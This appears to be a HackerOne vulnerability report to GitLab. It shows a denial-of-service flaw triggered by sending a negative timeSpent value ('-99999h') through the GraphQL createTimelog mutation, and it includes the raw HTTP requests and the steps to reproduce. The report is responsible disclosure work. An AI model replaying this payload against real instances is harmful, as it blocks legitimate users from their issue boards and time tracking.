Unvalidated `timeSpent` value in POST /api/graphql `createTimelog` operation leads to unable to load issues on Issue board
HackerOne report #2053154 by toukakirishima
on 2023-07-06, assigned to @cmaxim:
Report | Attachments | How To Reproduce
Report
Summary
I found a DOS vulnerability when add Time spent on Issue, as an attacker I can make the victim unable to see the Time tracking report and also see the Issue on the Board.
Normally you can see Time tracking report and Issue on Board.
But as an attacker I can make the victim unable to see the Time tracking report and also see the Issue on the Board.
Let's say Touka Attacker is the attacker and Touka Kirishima is the victim.
And Touka Kirishima (victim) made Issues.
Steps to reproduce
- Go to Issues
- Add Time spent
- Click save and makesure burpsuite is on. You will see request like following, Example :
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukakirishima/testpoc/-/issues/23
Content-Type: application/json
X-Csrf-Token: x
X-Gitlab-Feature-Category: team_planning
Content-Length: 1234
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
[{"operationName":"createTimelog","variables":{"input":{"timeSpent":"1","spentAt":"2023-07-06T22:32:42+0700","summary":"","issuableId":"gid://gitlab/Issue/130410026"}},"query":"mutation createTimelog($input: TimelogCreateInput!) {\n timelogCreate(input: $input) {\n errors\n timelog {\n id\n issue {\n ...IssueTimeTrackingFragment\n __typename\n }\n mergeRequest {\n ...MergeRequestTimeTrackingFragment\n __typename\n }\n __typename\n }\n __typename\n }\n}\n\nfragment IssueTimeTrackingFragment on Issue {\n __typename\n id\n humanTotalTimeSpent\n totalTimeSpent\n timelogs {\n nodes {\n ...TimelogFragment\n __typename\n }\n __typename\n }\n}\n\nfragment TimelogFragment on Timelog {\n __typename\n id\n timeSpent\n user {\n id\n name\n __typename\n }\n spentAt\n note {\n id\n body\n __typename\n }\n summary\n userPermissions {\n adminTimelog\n __typename\n }\n}\n\nfragment MergeRequestTimeTrackingFragment on MergeRequest {\n __typename\n id\n humanTotalTimeSpent\n totalTimeSpent\n timelogs {\n nodes {\n ...TimelogFragment\n __typename\n }\n __typename\n }\n}\n"}]
- Send to Repeater
- Change timeSpent. Example :
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: */*
Accept-Language: id,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/toukakirishima/testpoc/-/issues/23
Content-Type: application/json
X-Csrf-Token: x
X-Gitlab-Feature-Category: team_planning
Content-Length: 1234
Origin: https://gitlab.com
Dnt: 1
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
[{"operationName":"createTimelog","variables":{"input":{"timeSpent":"-99999h","spentAt":"2023-07-06T22:32:42+0700","summary":"","issuableId":"gid://gitlab/Issue/130410026"}},"query":"mutation createTimelog($input: TimelogCreateInput!) {\n timelogCreate(input: $input) {\n errors\n timelog {\n id\n issue {\n ...IssueTimeTrackingFragment\n __typename\n }\n mergeRequest {\n ...MergeRequestTimeTrackingFragment\n __typename\n }\n __typename\n }\n __typename\n }\n}\n\nfragment IssueTimeTrackingFragment on Issue {\n __typename\n id\n humanTotalTimeSpent\n totalTimeSpent\n timelogs {\n nodes {\n ...TimelogFragment\n __typename\n }\n __typename\n }\n}\n\nfragment TimelogFragment on Timelog {\n __typename\n id\n timeSpent\n user {\n id\n name\n __typename\n }\n spentAt\n note {\n id\n body\n __typename\n }\n summary\n userPermissions {\n adminTimelog\n __typename\n }\n}\n\nfragment MergeRequestTimeTrackingFragment on MergeRequest {\n __typename\n id\n humanTotalTimeSpent\n totalTimeSpent\n timelogs {\n nodes {\n ...TimelogFragment\n __typename\n }\n __typename\n }\n}\n"}]
- Click Send until the Response HTTP/2 500 Internal Server Error appears (usually 5 times when you click Send)
- Reload the page and you unable to see the Time tracking report and see Issues on the Board
POV from Attacker
POV from Victim
POC
bandicam_2023-07-06_22-42-12-864.mp4
Output of checks
This bug happens on GitLab.com
Impact
- Attacker can make victim unable to see the Time tracking report.
- Attacker can make victim unable to see Issues on the Board.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- image.png
- bandicam_2023-07-06_22-42-12-864.mp4
How To Reproduce
Please add reproducibility information to this section: